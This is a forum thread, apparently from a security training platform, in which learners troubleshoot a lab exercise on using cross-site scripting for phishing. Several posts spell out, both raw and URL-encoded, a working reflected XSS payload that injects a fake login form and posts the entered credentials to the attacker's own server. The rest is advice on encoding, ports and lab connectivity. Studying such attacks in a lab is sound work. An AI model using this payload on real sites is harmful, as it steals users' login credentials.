Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

HTB Content Academy
1

[SPOILERS ALERT!] Hello! Newbie here trying to learn some pentest tools with the academy. First post :slight_smile:

I am stuck in the exercise of the Phishing section. I have managed to set up the PHP server and the payload that connects to the server. The resultant URL is

https://SERVER-IP/phishing/index.php?url='/><script>document.write('<h3>Please login to continue</h3><form action=http://MY-IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

with SERVER-IP being the HTB machineā€™s, and MY-IP being my tun0 IP. When I open the link and fill the forms and press enter, my PHP server successfully receives the login details and everything behaves as expected.

The problem is that when I go to https://SERVER-IP/phishing/send.php, paste the mentioned link and press ā€œSendā€, the page shows ā€œIssue in sending URL!ā€ and nothing reaches my PHP server.

I have tried URL encoding, with the same result.

Is there something obvious I am missing?

Thanks a lot for any help! :slight_smile:

2

Try PHP server with 443.

3

Thanks for the help! It wasnā€™t the port, but found the solution anyway. Had to encode the URL, and send HTTP (not https).

4

I ran into the same issue, but mine had a different cause/solution.

For anyone in the future that gets the ā€œIssue in sending URL!ā€, double check to make sure the payload you send is exactly what the material provides. Seems a little obvious in hindsight, but I wasted a good bit of time over a ā€œlab-ismā€ that wouldnā€™t have mattered in a ā€œreal-worldā€ instance; hopefully I can save someone else some trouble. :slight_smile:

6

thanks so much, explanation was helpful, the encoding got me as well.

7

Has anyone done the skills assessment for that same module? If you have please dm me I can use some help. Also to the question on top try resetting the target IP. Thatā€™s the only thing I can think of.

8

for me this server was quite unstable and I needed to restart it very often.

do not forget test if your local server is accessible from the server ( local firewall settings )

9

My I tested the URL it worked my problem is setting up the server. I canā€™t connect to 0.0.0.0:80 because its already listening. I trying 8080, 8000, and 81, no of them gets a response. Did everyone use the 0.0.0.0:80 for the address?

10

[quote=ā€œQuickFix914, post:9, topic:249212ā€]
Did everyone use the 0.0.0.0:80 for the address?[/quote]

Iā€™m a dunce I got it. Going to my corner.

11

My script worked, and as everyone here, Iā€™ve stumble upon the ā€œIssue in sending URL!ā€ error.
This what Iā€™ve tried:

  1. Using ZAP browser.
  2. Installing and using Chrome browser.
  3. Using the payload of xlandrexl1 as CyberSecN00b said, as Iā€™ve created a different script than the original.
  4. Encoding both payloads in 6 websites in case the issue was the server didnā€™t like the format.
  5. As my PHP server used port 8080 (couldnā€™t close 80, already in use by HTBā€™s pwnbox), so tried both payloads with :8080 removed from the URL in case the website didnā€™t like and although it made no sense.
  6. Finally, and this was the solution, Iā€™ve noticed that the website might not like the encoding of the URL in only some parts (the ones related to the ā€˜usefulā€™ URL) sos it didnā€™t realize it was a valid URL. So using the payload from xlandrexl1 as an example, it ended up like this:
    http://target.ip/phishing/index.php?url= http:/my.php.server.ip:8080

Hope this helps someone out there!

12

Iā€™m sorry, it doesnā€™t allow me to put the correct sentence. What I meant was, you have to encode only the query parameters from the URL, so you would have:
http://target.ip/phishing/index.php?url= ENCODED URL PART http://my.php.server.ip:8080 ENCODED URL PART

1 Like
13

This scenario is really starting to bother me, and surely there is a better way HTB could check for correct solutions. Like most people above I have a working solution that is as far as I can tell EXACTLY what the material provided.

http://TARGET IP/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://MY IP:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform').remove();%3C/script%3E%3C!--

Naturally, port 80 is in use so the php server is running on port 88, other than that I cant see any difference. Iā€™ve tried encoding in different ways, using different ports, using burp to send the link in more specific ways like wrapping the address in HTML hyperlink tags.

Could someone please just post a working link so I can understand the awful specific formatting?

UPDATE: My solution is correct, it now inexplicably works, HTB is just garbage.

1 Like
14

Thnx, that helped a lot. Iā€™m really soldiering through and get most of it myself and donā€™t mind spending hours/days searching for answers but having a working scenario/link and having it rated incorrect because of encoding issues of parts of the URL is really too much imo of what can be expected. Thanks a heap :).

15

Itā€™s still not working for me even after encoding the url. My url looks like this:


http://10.129.164.70/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://10.0.2.15:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform).remove();%3C/script%3E%3C!--

I still get the ā€˜Issue in sending URL!ā€™ error. Been at this for a few days. Any help would be appreciated!

16

Itā€™s just shitty but in my case you musnā€™t encode all, just parts. The way it is written (and the way you executed it) is according to the wording I guess. But @Patoman19 also mentions that you ONLY have to encode the query parts and that meant for me starting encoding later in the link http://ā€¦snippetā€¦=ā€˜>document.write(ā€™ ENCODED URL PART etc. Hope this helps.

17

so should my code be like this

document.write(ā€˜

Please login to continue

<!ā€“ā€™);
this is where im stuck
Screen_Shot_2022-10-06_at_6.41.09_PM
Screen_Shot_2022-10-06_at_6.41.09_PM1706Ɨ1066 207 KB

19

I still canā€™t get it right. Iā€™ve tried all sorts of encoding. Iā€™m about done. This is ridiculous.

20

Can you help me? Iā€™ve tried your suggestion and still get the same error.

21

Never mind, I solved the issue (sort of). Seems to be some sort of issue with the connection between my machine and HTB servers. When I jumped on their Pwnbox I submitted the exact same url and it worked. Have no idea what the problem is with the connection. This is the first time this issue has popped up. Havenā€™t had to use the pwnbox before (itā€™s so slow, I hate it so much).

Is anyone else having issues with their servers going down regularly? You submit a form and it tells you that the connection timed out? Happens to me every 30 seconds or so.

22

can you help me figure out what you did please? are you on discord?